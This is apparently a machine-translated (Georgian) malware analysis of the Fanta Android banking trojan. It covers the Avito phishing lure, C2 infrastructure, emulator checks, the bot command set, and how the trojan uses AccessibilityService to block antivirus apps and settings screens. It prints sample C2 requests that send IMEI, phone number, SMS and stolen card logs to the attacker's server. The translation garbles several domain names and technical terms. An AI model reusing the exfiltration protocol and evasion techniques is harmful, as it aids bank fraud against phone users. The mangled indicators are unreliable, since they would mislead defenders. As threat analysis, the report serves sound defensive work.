Leysya, Fanta: ახალი ტაქტიკა ძველი Android Trojan-ისთვის

ერთ მშვენიერ დღეს გსურთ გაყიდოთ რამე Avito-ზე და, განათავსოთ თქვენი პროდუქტის დეტალური აღწერა (მაგალითად, RAM მოდული), მიიღებთ ამ შეტყობინებას:

როდესაც გახსნით ბმულს, დაინახავთ ერთი შეხედვით უვნებელ გვერდს, რომელიც გაცნობებთ თქვენ, ბედნიერ და წარმატებულ გამყიდველს, რომ თქვენი შესყიდვა განხორციელდა:

მას შემდეგ რაც დააწკაპუნებთ ღილაკზე „გაგრძელება“, APK ფაილი ჩამოიტვირთება თქვენს Android მოწყობილობაში ხატულით და სანდო სახელით. თქვენ დააინსტალირეთ აპლიკაცია, რომელიც რატომღაც ითხოვდა AccessibilityService-ის უფლებებს, შემდეგ გამოჩნდა რამდენიმე ფანჯარა და სწრაფად გაქრა და ... ეს არის ის.

თქვენ მიდიხართ თქვენი ბალანსის შესამოწმებლად, მაგრამ რატომღაც თქვენი საბანკო აპლიკაცია კვლავ ითხოვს თქვენი ბარათის დეტალებს. მონაცემების შეყვანის შემდეგ, საშინელი რამ ხდება: თქვენთვის ჯერ კიდევ გაუგებარი მიზეზის გამო, ფული იწყებს გაქრობას თქვენი ანგარიშიდან. თქვენ ცდილობთ პრობლემის გამოსწორებას, მაგრამ თქვენი ტელეფონი წინააღმდეგობას უწევს: ის თავისთავად აჭერს უკანა და სახლის კლავიშებს, არ ითიშება და არ გაძლევთ უფლებას გაააქტიუროთ უსაფრთხოების ზომები. შედეგად, რჩები ფულის გარეშე, შენი პროდუქტი არ იყიდება, დაბნეული ხარ და გიკვირს: რა მოხდა?

პასუხი მარტივია: თქვენ ხართ Fanta Android ტროას, Flexnet ოჯახის მსხვერპლი. Როგორ მოხდა? ახლა ავხსნათ.

Ავტორები: ანდრეი პოლოვინკინიმავნე კოდების უმცროსი ანალიტიკოსი, ივან პისარევი, მავნე კოდების ანალიტიკოსი.

ზოგიერთი სტატისტიკა

Android Trojans-ის Flexnet ოჯახის შესახებ პირველად 2015 წელს დაფიქსირდა. საქმიანობის საკმაოდ ხანგრძლივი პერიოდის განმავლობაში ოჯახი გაფართოვდა რამდენიმე ქვესახეობამდე: Fanta, Limebot, Lipton და ა.შ. ტროას, ისევე როგორც მასთან დაკავშირებული ინფრასტრუქტურა, არ დგას: ვითარდება ახალი ეფექტური განაწილების სქემები - ჩვენს შემთხვევაში, მაღალი ხარისხის ფიშინგ გვერდები, რომლებიც მიმართულია კონკრეტული მომხმარებლის გამყიდველზე, ხოლო ტროას დეველოპერები მიჰყვებიან მოდის ტენდენციებს. ვირუსის ჩაწერა - ისინი ამატებენ ახალ ფუნქციას, რაც შესაძლებელს ხდის უფრო ეფექტურად მოიპაროს ფული ინფიცირებული მოწყობილობებიდან და გვერდის ავლით დამცავი მექანიზმები.

ამ სტატიაში აღწერილი კამპანია გამიზნულია მომხმარებლებისთვის რუსეთიდან, ინფიცირებული მოწყობილობების მცირე რაოდენობა დაფიქსირდა უკრაინაში და კიდევ უფრო ნაკლები ყაზახეთსა და ბელორუსიაში.

მიუხედავად იმისა, რომ Flexnet 4 წელზე მეტია Android ტროას ასპარეზზეა და მრავალი მკვლევარის მიერ იყო შესწავლილი, ის მაინც კარგ ფორმაშია. 2019 წლის იანვრიდან ზარალის პოტენციური ოდენობა 35 მილიონ რუბლზე მეტია - და ეს მხოლოდ რუსეთში კამპანიებისთვისაა. 2015 წელს ამ Android Trojan-ის სხვადასხვა ვერსიები გაიყიდა მიწისქვეშა ფორუმებზე, სადაც ასევე შეგიძლიათ იპოვოთ ტროას წყაროს კოდი დეტალური აღწერილობით. და ეს ნიშნავს, რომ მსოფლიოში ზიანის სტატისტიკა კიდევ უფრო შთამბეჭდავია. ცუდი ფიგურა არ არის ასეთი მოხუცისთვის, არა?

გაყიდვიდან თაღლითობამდე

როგორც ჩანს ადრე წარმოდგენილი ფიშინგის გვერდის ეკრანის ანაბეჭდიდან Avito რეკლამების განთავსებისთვის ინტერნეტ სერვისის ქვეშ, ის მომზადდა კონკრეტული მსხვერპლისთვის. როგორც ჩანს, თავდამსხმელები იყენებენ Avito-ს ერთ-ერთ პარსერს, ამოიღებენ გამყიდველის ტელეფონის ნომერს და სახელს, ასევე პროდუქტის აღწერას. გვერდის განლაგებისა და APK ფაილის მომზადების შემდეგ, მსხვერპლს ეგზავნება SMS შეტყობინება მისი სახელით და ფიშინგის გვერდის ბმული, რომელიც შეიცავს მისი პროდუქტის აღწერას და პროდუქტის „რეალიზებიდან“ მიღებულ თანხას. ღილაკზე დაჭერით მომხმარებელი იღებს მავნე APK ფაილს - Fanta.

shcet491[.]ru დომენის შესწავლამ აჩვენა, რომ ის დელეგირებულია ჰოსტინგერის DNS სერვერებზე:

• ns1.hostinger.ru
• ns2.hostinger.ru
• ns3.hostinger.ru
• ns4.hostinger.ru

დომენის ზონის ფაილი შეიცავს ჩანაწერებს, რომლებიც მიუთითებენ IP მისამართებზე 31.220.23[.]236, 31.220.23[.]243 და 31.220.23[.]235. თუმცა, დომენის ძირითადი რესურსის ჩანაწერი (A-record) მიუთითებს სერვერზე IP მისამართით 178.132.1[.]240.

IP მისამართი 178.132.1[.]240 მდებარეობს ნიდერლანდებში და ეკუთვნის ჰოსტერს მსოფლიო ნაკადი. IP მისამართები 31.220.23[.]235, 31.220.23[.]236 და 31.220.23[.]243 მდებარეობს გაერთიანებულ სამეფოში და ეკუთვნის საერთო ჰოსტინგის სერვერს HOSTINGER. გამოიყენება როგორც რეგისტრატორი openprov-ru. დომენები ასევე გადაჭრილია IP მისამართით 178.132.1[.]240:

• სდელკა-რუ[.]რუ
• პროდუქტი-ავ[.]რუ
• ავ-პროდუქტ[.]რუ
• en-deal[.]en
• shcet382[.]ru
• sdelka221[.]en
• sdelka211[.]en
• vyplata437[.]ru
• viplata291[.]en
• თარგმანი273[.]en
• თარგმანი901[.]en

უნდა აღინიშნოს, რომ შემდეგი ფორმატის ბმულები ხელმისაწვდომი იყო თითქმის ყველა დომენიდან:

http://(www.){0,1}<%domain%>/[0-9]{7}

ეს შაბლონი ასევე შეიცავს ბმულს SMS შეტყობინებისგან. ისტორიული მონაცემებით, აღმოჩნდა, რომ ზემოაღნიშნული ნიმუშის მიხედვით რამდენიმე ბმული შეესაბამება ერთ დომენს, რაც მიუთითებს ერთი დომენის გამოყენებაზე ტროას რამდენიმე მსხვერპლზე გასავრცელებლად.

მოდით, ცოტა წინ გადავხტეთ: როგორც საკონტროლო სერვერი, SMS-დან ბმულიდან გადმოწერილი ტროა იყენებს მისამართს onuseseddohap[.]კლუბი. ეს დომენი დარეგისტრირდა 2019-03-12, და 2019-04-29 წლიდან, APK აპლიკაციები ურთიერთქმედებდნენ ამ დომენთან. VirusTotal-დან მიღებული მონაცემების საფუძველზე, ამ სერვერთან ურთიერთქმედებდა სულ 109 აპლიკაცია. თავად დომენი გადაწყვეტილია IP მისამართით 217.23.14[.]27, მდებარეობს ნიდერლანდებში და ეკუთვნის მასტერს მსოფლიო ნაკადი. გამოიყენება როგორც რეგისტრატორი სახელი. დომენები ასევე გადაჭრილია ამ IP მისამართით bad-racoon[.]კლუბი (2018-09-25 წლიდან) და bad-racoon[.]ცოცხალი (2018-10-25 წლიდან). დომენით bad-racoon[.]კლუბი ურთიერთქმედებს 80-ზე მეტ APK ფაილთან bad-racoon[.]ცოცხალი - 100-ზე მეტი.

ზოგადად, თავდასხმის კურსი შემდეგია:

რა აქვს ფანტას სახურავის ქვეშ?

Android-ის მრავალი სხვა ტროას მსგავსად, Fanta-ს შეუძლია წაიკითხოს და გაგზავნოს SMS შეტყობინებები, გააკეთოს USSD მოთხოვნები და აჩვენოს საკუთარი ფანჯრები აპლიკაციების (მათ შორის, საბანკო) თავზე. თუმცა, ამ ოჯახის ფუნქციონირების არსენალში მოვიდა: Fanta-მ დაიწყო გამოყენება ხელმისაწვდომობის სერვისი სხვადასხვა მიზნებისთვის: სხვა აპლიკაციების შეტყობინებების შინაარსის წაკითხვა, ინფიცირებულ მოწყობილობაზე ტროას გამოვლენის თავიდან აცილება და შესრულების შეჩერება და ა.შ. Fanta მუშაობს 4.4-ზე ძველ Android-ის ყველა ვერსიაზე. ამ სტატიაში ჩვენ უფრო დეტალურად განვიხილავთ ფანტას შემდეგ ნიმუშს:

• MD5: 0826bd11b2c130c4c8ac137e395ac2d4
• SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
• SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

გაშვებისთანავე

გაშვებისთანავე ტროას მალავს თავის ხატს. აპლიკაციას შეუძლია იმუშაოს მხოლოდ იმ შემთხვევაში, თუ ინფიცირებული მოწყობილობის სახელი არ არის სიაში:

• android_x86
• VirtualBox
• Nexus 5X (bullhead)
• Nexus 5 (საპარსი)

ეს შემოწმება ხორციელდება მთავარ ტროას სერვისში - MainService. პირველი გაშვების დროს, აპლიკაციის კონფიგურაციის პარამეტრები ინიციალიზებულია ნაგულისხმევი მნიშვნელობებით (კონფიგურაციის მონაცემთა შენახვის ფორმატი და მათი მნიშვნელობა მოგვიანებით იქნება განხილული), ასევე ახალი ინფიცირებული მოწყობილობის რეგისტრაცია საკონტროლო სერვერზე. სერვერზე გაიგზავნება HTTP POST მოთხოვნა შეტყობინების ტიპით რეგისტრაცია_ბოტი და ინფორმაცია ინფიცირებული მოწყობილობის შესახებ (Android ვერსია, IMEI, ტელეფონის ნომერი, ოპერატორის სახელი და კოდი, სადაც ოპერატორი რეგისტრირებულია). მისამართი გამოიყენება როგორც მართვის სერვერი hXXp://onuseseddohap[.]club/controller.php. საპასუხოდ, სერვერი აგზავნის შეტყობინებას, რომელიც შეიცავს ველებს bot_id, bot_pwd, სერვერზე - ეს მნიშვნელობები ინახება აპლიკაციის მიერ, როგორც CnC სერვერის პარამეტრები. Პარამეტრი სერვერზე სურვილისამებრ, თუ ველი არ იქნა მიღებული: Fanta იყენებს რეგისტრაციის მისამართს − hXXp://onuseseddohap[.]club/controller.php. CnC მისამართის შეცვლის ფუნქცია შეიძლება გამოყენებულ იქნას ორი პრობლემის გადასაჭრელად: დატვირთვის თანაბრად გადანაწილება რამდენიმე სერვერს შორის (ინფიცირებული მოწყობილობების დიდი რაოდენობით, არაოპტიმიზებული ვებ სერვერის დატვირთვა შეიძლება იყოს მაღალი), ასევე ალტერნატივის გამოყენება. სერვერი ერთ-ერთი CnC სერვერის გაუმართაობის შემთხვევაში.

თუ მოთხოვნის გაგზავნისას მოხდა შეცდომა, ტროასი გაიმეორებს რეგისტრაციის პროცესს 20 წამის შემდეგ.

მოწყობილობის წარმატებით რეგისტრაციის შემდეგ, Fanta უჩვენებს მომხმარებელს შემდეგ შეტყობინებას:

მნიშვნელოვანი შენიშვნა: გამოძახებული სერვისი სისტემის უსაფრთხოება - ტროას სერვისის სახელი და ღილაკზე დაჭერის შემდეგ OK გაიხსნება ფანჯარა ინფიცირებული მოწყობილობის ხელმისაწვდომობის პარამეტრებით, სადაც მომხმარებელმა თავად უნდა მიანიჭოს Accessibility უფლებები მავნე სერვისზე:

მას შემდეგ რაც მომხმარებელი ჩაირთვება ხელმისაწვდომობის სერვისი, Fanta წვდება აპლიკაციის ფანჯრების შინაარსს და მათში შესრულებულ მოქმედებებს:

ხელმისაწვდომობის უფლებების მოპოვებისთანავე, ტროასი ითხოვს ადმინისტრატორის უფლებებს და შეტყობინებების წაკითხვის უფლებებს:

AccessibilityService-ის დახმარებით აპლიკაცია ახდენს კლავიშების დარტყმის სიმულაციას, რითაც ანიჭებს საკუთარ თავს ყველა საჭირო უფლებას.

Fanta ქმნის მონაცემთა ბაზების რამდენიმე შემთხვევას (რომლებიც მოგვიანებით იქნება აღწერილი), რომლებიც აუცილებელია კონფიგურაციის მონაცემების შესანახად, ასევე პროცესის დროს შეგროვებული ინფიცირებული მოწყობილობის შესახებ ინფორმაციის შესანახად. შეგროვებული ინფორმაციის გასაგზავნად, ტროას ქმნის განმეორებადი დავალება, რომელიც შექმნილია მონაცემთა ბაზიდან ველების განტვირთვისა და საკონტროლო სერვერის ბრძანების მისაღებად. CnC გამოძახების ინტერვალი დაყენებულია Android-ის ვერსიიდან გამომდინარე: 5.1-ის შემთხვევაში ინტერვალი იქნება 10 წამი, წინააღმდეგ შემთხვევაში 60 წამი.

ბრძანების მისაღებად, Fanta აკეთებს მოთხოვნას GetTask საკონტროლო სერვერზე. საპასუხოდ, CnC-ს შეუძლია გააგზავნოს ერთ-ერთი შემდეგი ბრძანება:

გუნდი	აღწერა
0	SMS შეტყობინების გაგზავნა
1	განახორციელეთ სატელეფონო ზარი ან USSD ბრძანება
2	აახლებს პარამეტრს ინტერვალი
3	აახლებს პარამეტრს intercept
6	აახლებს პარამეტრს sms მენეჯერი
9	დაიწყეთ SMS შეტყობინებების შეგროვება
11	გადააყენეთ ტელეფონი ქარხნულ პარამეტრებზე
12	დიალოგური ფანჯრების შექმნის ჟურნალის ჩართვა/გამორთვა

Fanta ასევე აგროვებს შეტყობინებებს 70 საბანკო, სწრაფი გადახდისა და ელექტრონული საფულის აპლიკაციიდან და ინახავს მათ მონაცემთა ბაზაში.

კონფიგურაციის პარამეტრების შენახვა

კონფიგურაციის პარამეტრების შესანახად Fanta იყენებს სტანდარტულ მიდგომას Android პლატფორმისთვის - პრიორიტეტები- ფაილები. პარამეტრები შეინახება დასახელებულ ფაილში პარამეტრების. შენახული პარამეტრების აღწერა მოცემულია ქვემოთ მოცემულ ცხრილში.

სახელი	ნაგულისხმევი მნიშვნელობა	შესაძლო ღირებულებები	აღწერა
id	0	Integer	ბოტის ID
სერვერზე	hXXp://onuseseddohap[.]კლუბი/	URL	მართვის სერვერის მისამართი
pwd	-	სიმებიანი	სერვერის პაროლი
ინტერვალი	20	Integer	Დროის ინტერვალი. აჩვენებს რამდენ ხანს უნდა გადადოს შემდეგი ამოცანები: გაგზავნილი SMS შეტყობინების სტატუსის შესახებ მოთხოვნის გაგზავნისას ახალი ბრძანების მიღება საკონტროლო სერვერიდან
intercept	ყველა	ყველა/ტელნომერი	თუ ველი ტოლია სტრიქონის ყველა ან ტელნომერი, შემდეგ მიღებულ SMS შეტყობინებას აპლიკაციის თვალყური ადევნებს და არ აჩვენებს მომხმარებელს
sms მენეჯერი	0	0/1	ჩართეთ/გამორთეთ აპლიკაცია, როგორც ნაგულისხმევი SMS მიმღები
readDialog	ყალბი	Ჭეშმარიტი და ცრუ	მოვლენის აღრიცხვის ჩართვა/გამორთვა AccessibilityEvent

Fanta ასევე იყენებს ფაილს sms მენეჯერი:

სახელი	ნაგულისხმევი მნიშვნელობა	შესაძლო ღირებულებები	აღწერა
pckg	-	სიმებიანი	გამოყენებული SMS მენეჯერის სახელი

მონაცემთა ბაზის ურთიერთქმედება

ტროას იყენებს ორ მონაცემთა ბაზას თავისი მუშაობის დროს. დასახელებული მონაცემთა ბაზა a გამოიყენება ტელეფონიდან შეგროვებული სხვადასხვა ინფორმაციის შესანახად. მეორე მონაცემთა ბაზა დასახელებულია fanta.db და გამოიყენება პარამეტრების შესანახად, რომლებიც პასუხისმგებელნი არიან ფიშინგ ფანჯრების შექმნაზე, რომლებიც შექმნილია საბანკო ბარათების შესახებ ინფორმაციის შესაგროვებლად.

Trojan იყენებს მონაცემთა ბაზას а შეგროვებული ინფორმაციის შესანახად და მათი მოქმედებების აღრიცხვაზე. მონაცემები ინახება ცხრილში ჟურნალი. შემდეგი SQL მოთხოვნა გამოიყენება ცხრილის შესაქმნელად:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

მონაცემთა ბაზა შეიცავს შემდეგ ინფორმაციას:

1. ინფიცირებული მოწყობილობის შესვლა შეტყობინებით ტელეფონი ჩართულია!

2. შეტყობინებები აპლიკაციებიდან. შეტყობინება იქმნება შემდეგი შაბლონის მიხედვით:

(<%App Name%>)<%Title%>: <%Notification text%>

3. საბანკო ბარათის მონაცემები ტროას მიერ შექმნილი ფიშინგის ფორმებიდან. Პარამეტრი VIEW_NAME შეიძლება იყოს ერთ-ერთი სია:

• AliExpress
• ავიტო
• Google Play
• სხვადასხვა <%აპის სახელი%>

შეტყობინება დარეგისტრირებულია ფორმატში:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. შემომავალი/გამავალი SMS შეტყობინებები ფორმატში:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. ინფორმაცია პაკეტის შესახებ, რომელიც ქმნის დიალოგურ ფანჯარას ფორმატში:

(<%Package name%>)<%Package information%>

მაგიდის მაგალითი ჟურნალი:

Fanta-ს ერთ-ერთი ფუნქციაა საბანკო ბარათების შესახებ ინფორმაციის შეგროვება. მონაცემები გროვდება საბანკო აპლიკაციების გახსნისას ფიშინგის ფანჯრების შექმნით. ტროასი ქმნის ფიშინგ ფანჯარას მხოლოდ ერთხელ. ინფორმაცია იმის შესახებ, რომ ფანჯარა აჩვენეს მომხმარებელს, ინახება ცხრილში პარამეტრების მონაცემთა ბაზაში fanta.db. შემდეგი SQL მოთხოვნა გამოიყენება მონაცემთა ბაზის შესაქმნელად:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

ცხრილის ყველა ველი პარამეტრების ნაგულისხმევად ინიციალიზებულია 1-ზე (ფიშინგის ფანჯრის შექმნა). მას შემდეგ რაც მომხმარებელი შეიყვანს თავის მონაცემებს, მნიშვნელობა დაყენდება 0-ზე. ცხრილის ველების მაგალითი პარამეტრების:

• can_login — ველი პასუხისმგებელია საბანკო აპლიკაციის გახსნისას ფორმის ჩვენებაზე
• პირველი_ბანკი - არ გამოიყენება
• can_avito - ველი პასუხისმგებელია ფორმის ჩვენებაზე Avito აპლიკაციის გახსნისას
• can_ali - ველი პასუხისმგებელია ალიექსპრესის აპლიკაციის გახსნისას ფორმის ჩვენებაზე
• შეუძლია_სხვა - ველი პასუხისმგებელია სიიდან ნებისმიერი აპლიკაციის გახსნისას ფორმის ჩვენებაზე: Yula, Pandao, Drome Auto, Wallet. ფასდაკლების და ბონუს ბარათები, Aviasales, Booking, Trivago
• can_card - ველი პასუხისმგებელია გახსნისას ფორმის ჩვენებაზე Google Play

ურთიერთქმედება საკონტროლო სერვერთან

ქსელის ურთიერთქმედება საკონტროლო სერვერთან ხდება HTTP პროტოკოლის მეშვეობით. Fanta იყენებს პოპულარულ Retrofit ბიბლიოთეკას ქსელთან მუშაობისთვის. მოთხოვნები იგზავნება hXXp://onuseseddohap[.]club/controller.php. სერვერის მისამართის შეცვლა შესაძლებელია სერვერზე რეგისტრაციისას. ქუქი ფაილი შეიძლება დაბრუნდეს სერვერიდან. Fanta სერვერს უგზავნის შემდეგ მოთხოვნებს:

• ბოტის რეგისტრაცია საკონტროლო სერვერზე ხდება ერთხელ დაწყებისას. შემდეგი მონაცემები ინფიცირებული მოწყობილობის შესახებ იგზავნება სერვერზე:
  · Cookie - სერვერიდან მიღებული ქუქიები (ნაგულისხმევი მნიშვნელობა ცარიელი სტრიქონია)
  · რეჟიმი - სიმებიანი მუდმივი რეგისტრაცია_ბოტი
  · პრეფიქსი - მთელი რიცხვი მუდმივი 2
  · version_sdk - ჩამოყალიბებულია შემდეგი შაბლონის მიხედვით: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
  · imei — ინფიცირებული მოწყობილობის IMEI
  · ქვეყანა - ქვეყნის კოდი, რომელშიც ოპერატორი რეგისტრირებულია, ISO ფორმატში
  · რაოდენობა - ტელეფონის ნომერი
  · ოპერატორი - ოპერატორის სახელი

  სერვერზე გაგზავნილი მოთხოვნის მაგალითი:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 144
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
  

  მოთხოვნის საპასუხოდ, სერვერმა უნდა დააბრუნოს JSON ობიექტი, რომელიც შეიცავს შემდეგ პარამეტრებს:
  bot_id - ინფიცირებული მოწყობილობის იდენტიფიკატორი. თუ bot_id არის 0-ის ტოლი, Fanta ხელახლა შეასრულებს მოთხოვნას.
  bot_pwd - პაროლი სერვერისთვის.
  სერვერი - საკონტროლო სერვერის მისამართი. არჩევითი პარამეტრი. თუ პარამეტრი არ არის მითითებული, გამოყენებული იქნება აპლიკაციაში შენახული მისამართი.

  JSON ობიექტის მაგალითი:

  {
      "response":[
     	 {
     		 "bot_id": <%BOT_ID%>,
     		 "bot_pwd": <%BOT_PWD%>,
     		 "server": <%SERVER%>
     	 }
      ],
      "status":"ok"
  }

• სერვერისგან ბრძანების მიღების მოთხოვნა. შემდეგი მონაცემები იგზავნება სერვერზე:
  · Cookie — სერვერიდან მიღებული ქუქიები
  · განაცხადის — ინფიცირებული მოწყობილობის ID, რომელიც მიიღეს მოთხოვნის გაგზავნისას რეგისტრაცია_ბოტი
  · pwd - პაროლი სერვერისთვის
  · divice_admin - ველი განსაზღვრავს, მიღებულია თუ არა ადმინისტრატორის უფლებები. თუ მიღებულია ადმინისტრატორის უფლებები, ველი ტოლია 1წინააღმდეგ შემთხვევაში 0
  · Accessibility - ხელმისაწვდომობის სერვისის სტატუსი. თუ სერვისი დაიწყო, მნიშვნელობა არის 1წინააღმდეგ შემთხვევაში 0
  · SMS მენეჯერი - აჩვენებს, ჩართულია თუ არა ტროას SMS-ის მიღების ნაგულისხმევი აპლიკაცია
  · ეკრანზე — აჩვენებს რა მდგომარეობაშია ეკრანი. ღირებულება დადგინდება 1თუ ეკრანი ჩართულია, წინააღმდეგ შემთხვევაში 0;

  სერვერზე გაგზავნილი მოთხოვნის მაგალითი:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

  ბრძანებიდან გამომდინარე, სერვერმა შეიძლება დააბრუნოს JSON ობიექტი სხვადასხვა პარამეტრით:

  · გუნდი SMS შეტყობინების გაგზავნა: პარამეტრები შეიცავს ტელეფონის ნომერს, SMS შეტყობინების ტექსტს და გასაგზავნი შეტყობინების იდენტიფიკატორს. იდენტიფიკატორი გამოიყენება სერვერზე შეტყობინების გაგზავნისას setSmsStatus.

  {
      "response":
      [
     	 {
     		 "mode": 0,
     		 "sms_number": <%SMS_NUMBER%>,
     		 "sms_text": <%SMS_TEXT%>,
     		 "sms_id": %SMS_ID%
     	 }
      ],
      "status":"ok"
  }

  · გუნდი განახორციელეთ სატელეფონო ზარი ან USSD ბრძანება: ტელეფონის ნომერი ან ბრძანება მოდის პასუხში.

  {
      "response":
      [
     	 {
     		 "mode": 1,
     		 "command": <%TEL_NUMBER%>
     	 }
      ],
      "status":"ok"
  }

  · გუნდი შეცვალეთ ინტერვალის პარამეტრი.

  {
      "response":
      [
     	 {
     		 "mode": 2,
     		 "interval": <%SECONDS%>
     	 }
      ],
      "status":"ok"
  }

  · გუნდი შეცვალეთ კვეთის პარამეტრი.

  {
      "response":
      [
     	 {
     		 "mode": 3,
     		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
     	 }
      ],
      "status":"ok"
  }

  · გუნდი შეცვალეთ SmsManager ველი.

  {
      "response":
      [
     	 {
     		 "mode": 6,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

  · გუნდი შეაგროვეთ SMS შეტყობინებები ინფიცირებული მოწყობილობიდან.

  {
      "response":
      [
     	 {
     		 "mode": 9
     	 }
      ],
      "status":"ok"
  }

  · გუნდი გადააყენეთ ტელეფონი ქარხნულ პარამეტრებზე:

  {
      "response":
      [
     	 {
     		 "mode": 11
     	 }
      ],
      "status":"ok"
  }

  · გუნდი შეცვალეთ ReadDialog პარამეტრი.

  {
      "response":
      [
     	 {
     		 "mode": 12,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

• შეტყობინების გაგზავნა ტიპის setSmsStatus. ეს მოთხოვნა კეთდება ბრძანების შესრულების შემდეგ SMS შეტყობინების გაგზავნა. მოთხოვნა ასე გამოიყურება:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

• მონაცემთა ბაზის შინაარსის გაგზავნა. ერთი სტრიქონი გადადის თითო მოთხოვნაზე. შემდეგი მონაცემები იგზავნება სერვერზე:
  · Cookie — სერვერიდან მიღებული ქუქიები
  · რეჟიმი - სიმებიანი მუდმივი setSaveInboxSms
  · განაცხადის — ინფიცირებული მოწყობილობის ID, რომელიც მიიღეს მოთხოვნის გაგზავნისას რეგისტრაცია_ბოტი
  · ტექსტი — ტექსტი მონაცემთა ბაზის მიმდინარე ჩანაწერში (ველი d მაგიდიდან ჟურნალი მონაცემთა ბაზაში а)
  · რაოდენობა — მონაცემთა ბაზის მიმდინარე ჩანაწერის სახელი (ველი p მაგიდიდან ჟურნალი მონაცემთა ბაზაში а)
  · sms_mode - მთელი მნიშვნელობა (ველი m მაგიდიდან ჟურნალი მონაცემთა ბაზაში а)

  მოთხოვნა ასე გამოიყურება:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

  სერვერზე წარმატებული წარდგენის შემდეგ, მწკრივი წაიშლება ცხრილიდან. სერვერის მიერ დაბრუნებული JSON ობიექტის მაგალითი:

  {
      "response":[],
      "status":"ok"
  }

ურთიერთქმედება AccessibilityService-თან

AccessibilityService დანერგილია შეზღუდული შესაძლებლობის მქონე პირთათვის Android მოწყობილობების გამოყენების გასაადვილებლად. უმეტეს შემთხვევაში, აპლიკაციასთან ურთიერთობისთვის საჭიროა ფიზიკური ურთიერთქმედება. AccessibilityService საშუალებას გაძლევთ შექმნათ ისინი პროგრამულად. Fanta იყენებს სერვისს საბანკო აპლიკაციებში ყალბი ფანჯრების შესაქმნელად და სისტემის პარამეტრების და ზოგიერთი აპლიკაციის გახსნის თავიდან ასაცილებლად.

AccessibilityService-ის ფუნქციონირების გამოყენებით, ტროას მონიტორინგს უწევს ელემენტების ცვლილებები ინფიცირებული მოწყობილობის ეკრანზე. როგორც ადრე იყო აღწერილი, Fanta პარამეტრები შეიცავს პარამეტრს, რომელიც პასუხისმგებელია დიალოგური ფანჯრებით ოპერაციების ჩაწერაზე - readDialog. თუ ეს პარამეტრი დაყენებულია, მონაცემთა ბაზას დაემატება ინფორმაცია იმ პაკეტის სახელისა და აღწერილობის შესახებ, რომელმაც გამოიწვია ღონისძიება. გაშვებისას ტროასი ასრულებს შემდეგ მოქმედებებს:

• ახდენს უკანა და სახლის კლავიშების დარტყმის სიმულაციას შემდეგ შემთხვევებში:
  · თუ მომხმარებელს სურს მოწყობილობის გადატვირთვა
  · თუ მომხმარებელს სურს „Avito“ აპლიკაციის წაშლა ან წვდომის უფლებების შეცვლა
  · თუ გვერდზე არის ნახსენები "Avito" აპლიკაცია
  · როდესაც გახსნით „Google Play Protect“ აპს
  · AccessibilityService-ის პარამეტრებით გვერდების გახსნისას
  · როდესაც გამოჩნდება სისტემის უსაფრთხოების დიალოგური ფანჯარა
  · გვერდის გახსნისას პარამეტრებით „გადახაზეთ სხვა აპზე“
  · როდესაც ხსნით გვერდს "აპლიკაციები", "სარეზერვო და გადატვირთვა", "მონაცემთა გადატვირთვა", "პარამეტრების გადატვირთვა", "დეველოპერი პანელი", "სპექტ. შესაძლებლობები“, „ხელმისაწვდომობა“, „სპეციალური უფლებები“
  · თუ მოვლენა შეიქმნა გარკვეული აპლიკაციების მიერ.

  განაცხადის სია

  • Android
  • Master Lite
  • სუფთა ოსტატი
  • Clean Master x86 CPU-სთვის
  • Meizu აპლიკაციის ნებართვების მართვა
  • MIUI უსაფრთხოება
  • Clean Master - ანტივირუსული და ქეში და უსარგებლო გამწმენდი
  • მშობელთა კონტროლი და GPS: Kaspersky SafeKids
  • Kaspersky Antivirus AppLock & Web Security Beta
  • ვირუსის გამწმენდი, ანტივირუსული, გამწმენდი (MAX Security)
  • მობილური ანტივირუსული უსაფრთხოების PRO
  • Avast ანტივირუსული და უფასო დაცვა 2019
  • მობილური უსაფრთხოების მეგაფონი
  • AVG დაცვა Xperia-სთვის
  • მობილური უსაფრთხოება
  • Malwarebytes ანტივირუსული და დაცვა
  • ანტივირუსი Android 2019-ისთვის
  • უსაფრთხოების ოსტატი - ანტივირუსი, VPN, AppLock, Booster
  • AVG ანტივირუსი ტაბლეტისთვის Huawei System Manager
  • Samsung ხელმისაწვდომობა
  • Samsung Smart Manager
  • უსაფრთხოების ოსტატი
  • სიჩქარის გამძლეობა
  • Dr.Web
  • Dr.Web უსაფრთხოების სივრცე
  • Dr.Web მობილური მართვის ცენტრი
